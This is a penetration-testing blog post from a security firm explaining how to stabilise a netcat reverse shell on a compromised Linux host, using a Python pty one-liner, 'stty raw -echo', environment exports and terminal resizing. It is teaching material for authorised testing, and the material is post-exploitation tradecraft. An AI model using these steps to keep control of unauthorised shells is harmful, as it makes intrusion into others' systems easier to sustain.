*This blog entry was originally published on July 27, 2015 on the original Polito Blog by Ian Duffy. It was re-posted on October 3, 2017 due to migrating to a new blog platform.
When penetration testing, sometimes we get netcat (or equivalent) shells back from Linux / Unix systems that have some pretty severe restrictions. For example, if you run a command on the remote system and it hangs or takes a long time to return and you want to kill that command, hitting CTRL+C will actually kill netcat on your local system. Bye-bye shell! Another limitation is that some output from commands does not print correctly on the screen - for example the up arrow will produce garbled output on the screen instead of yielding the previous command typed into bash.
Plain Netcat Reverse Shell with No Fixup
Fortunately there is a fixup procedure to address this issue that I’ve found very useful. I have to give credit – I learned this by watching Phineas Fisher in the infamous video of the Sindicat Mossos de Esquadra (Catalan Police) hack. The following steps will help you fix up your netcat reverse shell so that you can use it much the same way as a regular remote terminal (SSH/Telnet) session.
Hopefully, the system on which you have a shell has Python installed. The quick and easy way to fixup the terminal with Python is via the following one-liner:
python -c 'import pty; pty.spawn("/bin/bash")'
Netcat Reverse Shell after Python Fixup
This command will run bash via a Python interpreter and will allow you to get a normal command prompt. This will allow you to run commands such as “su” and “sudo” on the remote system.
Once you have a valid shell on the remote system, there is still the problem of terminal control and escape sequences on the local host killing off your netcat listener. To fix this, type the following commands:
<CTRL+Z> bg
stty raw -echo
fg
reset
Netcat Reverse Shell After Control Character Fixup
This will background the netcat listener and disable echoing of characters in your local terminal. Characters will not be printed to the screen and also control characters will not get executed by your local terminal. This will allow you to use control characters over the netcat session. In addition to being able to use Ctrl+c to kill hung processes, we can also use other programs such as screen that rely on control characters for their normal operation.
export SHELL=/bin/bash
export HOME=<wherever you created your home directory>
export TERM=xterm-color
Note: The value of the TERM environment variable should be the output of the command echo $TERM on your local system so that control characters are interpreted properly.
Finally, we need to tell the remote system how big our local terminal window is (in rows and columns) so that it sends output back to us in the appropriate size. To find out how many rows and columns our local terminal is using, open up a new tab (CTRL+SHIFT+T) and type:
stty -a
Make a note of the value for rows and columns on the first line of the output. In your netcat shell, type the following command:
stty rows <row count> cols <col count>
where <row count> and <col count> are the values from the stty -a command.
Setting Up Environment Variables
That’s it. You should now have a fully functional shell over netcat that allows you to use control characters. This becomes powerful with the screen command because now you can have multiple terminals running multiple processes over a single reverse shell. If you haven’t had any experience with screen, I highly recommend you get familiar with it.
Happy hunting.
Polito, Inc. offers a wide range of security consulting services including penetration testing, vulnerability assessments, incident response, digital forensics, and more. If your business or your clients have any cyber security needs, contact our experts and experience what Masterful Cyber Security is all about.
E-mail: info@politoinc.com
Phone: 571-969-7039
Website: politoinc.com
Comentarios